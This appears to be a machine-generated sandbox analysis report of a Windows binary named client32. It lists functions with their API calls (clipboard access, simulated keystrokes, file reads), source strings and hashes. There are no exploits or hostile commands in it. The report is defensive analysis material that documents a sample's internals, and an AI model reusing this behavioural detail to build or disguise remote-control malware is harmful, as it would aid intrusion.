                                                                              • Opcode ID: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                              • Instruction ID: a1ea6c524cc80d8162a63b7122f67c86dce844b07e1b6a5dabb7ffb63b15338b
                                                                              • Opcode Fuzzy Hash: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                              • Instruction Fuzzy Hash: F001A175541B029FE7218FA9C844749FBE0AF51319F10890ED4A657B90CBB1A640CF11
                                                                              Function 11032570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalLock.KERNEL32(?), ref: 1103257A
                                                                              • GlobalSize.KERNEL32(?), ref: 11032583
                                                                              • _malloc.LIBCMT ref: 1103258F
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memmove.LIBCMT ref: 110325BE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Global$AllocateErrorExitHeapLastLockMessageProcessSize_malloc_memmovewsprintf
                                                                              • String ID: *pData$..\ctl32\clipbrd.cpp
                                                                              • API String ID: 4160999899-373438037
                                                                              • Opcode ID: 45447524fc669c612e85c5f8427f3bd9f16ba901bd46638992dd70fbe825a56c
                                                                              • Instruction ID: 7dfec25502a60c4b73a96eedf82075b45f68722f315a0679132fda7e4580d095
                                                                              • Opcode Fuzzy Hash: 45447524fc669c612e85c5f8427f3bd9f16ba901bd46638992dd70fbe825a56c
                                                                              • Instruction Fuzzy Hash: D9F08976A10229BBDB109FA9EC85EAB779CEF8925CB040035F959DB300E571F910C7A1
                                                                              Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                              • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                              • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                              • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                              • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                              Function 11072220 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 430COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Error %dz discarded %-4u bytes: %s, xrefs: 1107231C
                                                                              • %02x , xrefs: 110722FD
                                                                              • Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 110725C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
                                                                              • API String ID: 0-2590468221
                                                                              • Opcode ID: e872272a0c7033acd62c2daa5ee8986e8f6ac48a4914a04a425d6e9df377d2c3
                                                                              • Instruction ID: dc1cd5e0ad3670399cd4aca84954527973052ac6e0f745adce462208d448e3a9
                                                                              • Opcode Fuzzy Hash: e872272a0c7033acd62c2daa5ee8986e8f6ac48a4914a04a425d6e9df377d2c3
                                                                              • Instruction Fuzzy Hash: 14E18179F00205ABDB24CF54C990F6AB7A9FF89304F148269E9499F385DB30EC45CBA5
                                                                              Function 110320B0 Relevance: 9.2, APIs: 6, Instructions: 156fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11032104
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 11032120
                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 11032143
                                                                              • _memmove.LIBCMT ref: 11032197
                                                                              • CloseHandle.KERNEL32(?), ref: 110321D3
                                                                              • CloseHandle.KERNEL32(?), ref: 11032234
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreateReadSize_malloc_memmove_memset
                                                                              • String ID:
                                                                              • API String ID: 2574518533-0
                                                                              • Opcode ID: 5a69c91c3e0155832479c9a092b2124aef59f010748d926c772fca7d5382b92e
                                                                              • Instruction ID: 1586da20782dc2dc3b0b5513d0193b6af73180b02edcfb9cb2efa48bc0ea1d85
                                                                              • Opcode Fuzzy Hash: 5a69c91c3e0155832479c9a092b2124aef59f010748d926c772fca7d5382b92e
                                                                              • Instruction Fuzzy Hash: CF512BB5E00209AFCB14DFB8D980A9EFBF9FF98318F104529E515E7240EB71A915CB90
                                                                              Function 11032310 Relevance: 9.1, APIs: 6, Instructions: 149windowclipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000080), ref: 1103239B
                                                                              • _memmove.LIBCMT ref: 11032429
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11032499
                                                                              • TranslateMessage.USER32(?), ref: 110324A7
                                                                              • DispatchMessageA.USER32(?), ref: 110324B4
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110324CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Peek$ClipboardDispatchFormatNameTranslate_memmove
                                                                              • String ID:
                                                                              • API String ID: 1130817274-0
                                                                              • Opcode ID: a3e8ff29f3dd775e41d8f40c229ca5a054c85fdaabae9d696263d2c5e5cc1c4a
                                                                              • Instruction ID: 072678467dce0c8da7088ebee32012870df3c8fce8058e99ad8d1d1a60a604fc
                                                                              • Opcode Fuzzy Hash: a3e8ff29f3dd775e41d8f40c229ca5a054c85fdaabae9d696263d2c5e5cc1c4a
                                                                              • Instruction Fuzzy Hash: 1B51F9719102299BDB24DF64CC80BAAB7F9BF88704F54C1D9E589A7244DF71AA84CFD0
                                                                              Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                              • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                              • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                              • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                              • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                              • String ID:
                                                                              • API String ID: 2375713580-0
                                                                              • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                              • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                              • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                              • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                              Function 11028570 Relevance: 9.1, APIs: 6, Instructions: 52keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 11028450: _memset.LIBCMT ref: 11028485
                                                                                • Part of subcall function 11028450: wsprintfA.USER32 ref: 110284BA
                                                                                • Part of subcall function 11028450: WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
                                                                                • Part of subcall function 11028450: GetExitCodeProcess.KERNEL32(?,?), ref: 11028513
                                                                                • Part of subcall function 11028450: CloseHandle.KERNEL32(?,00000000), ref: 11028545
                                                                                • Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 1102854E
                                                                              • keybd_event.USER32(0000005B,00000000,00000000,00000000), ref: 110285A6
                                                                              • keybd_event.USER32(0000005B,00000000,00000002,00000000), ref: 110285B0
                                                                              • keybd_event.USER32(00000012,00000000,00000000,00000000), ref: 110285B7
                                                                              • keybd_event.USER32(00000009,00000000,00000000,00000000), ref: 110285C1
                                                                              • keybd_event.USER32(00000009,00000000,00000002,00000000), ref: 110285CB
                                                                              • keybd_event.USER32(00000012,00000000,00000002,00000000), ref: 110285D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: keybd_event$CloseHandle_memset$CodeExitObjectOpenProcessSingleVersionWait_strncpywsprintf
                                                                              • String ID:
                                                                              • API String ID: 1958445444-0
                                                                              • Opcode ID: 6a0af90241b9cb3d13d279edc5e1ba729062257bd6306d8ab941137ea0041105
                                                                              • Instruction ID: e9f6e0afee387c5887b18efcf55e32cbbb7377a290e8e161289c10e6448a1db8
                                                                              • Opcode Fuzzy Hash: 6a0af90241b9cb3d13d279edc5e1ba729062257bd6306d8ab941137ea0041105
                                                                              • Instruction Fuzzy Hash: 15F0B735FC033935F53066A51D0BF5B7A888B00FA9FA54062BF08BE4C6A9C179109AE9
                                                                              Function 11002590 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ObjectSelect$LineMove
                                                                              • String ID:
                                                                              • API String ID: 359220273-0
                                                                              • Opcode ID: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
                                                                              • Instruction ID: 21f229d1c7d8c8dc4b4b16be7dffbf2429469ae1aeee6a23e1c2fe7cad82a0fa
                                                                              • Opcode Fuzzy Hash: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
                                                                              • Instruction Fuzzy Hash: CA012876201128BFD704DB95DD84DABF7ACFF89210B108256FD2883640D770AD018BA0
                                                                              Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2857295742-0
                                                                              • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                              • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                              • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                              • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                              Function 11088020 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110886C0: _memset.LIBCMT ref: 110886DF
                                                                                • Part of subcall function 110886C0: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              • _memset.LIBCMT ref: 110880C2
                                                                              • _free.LIBCMT ref: 11088176
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
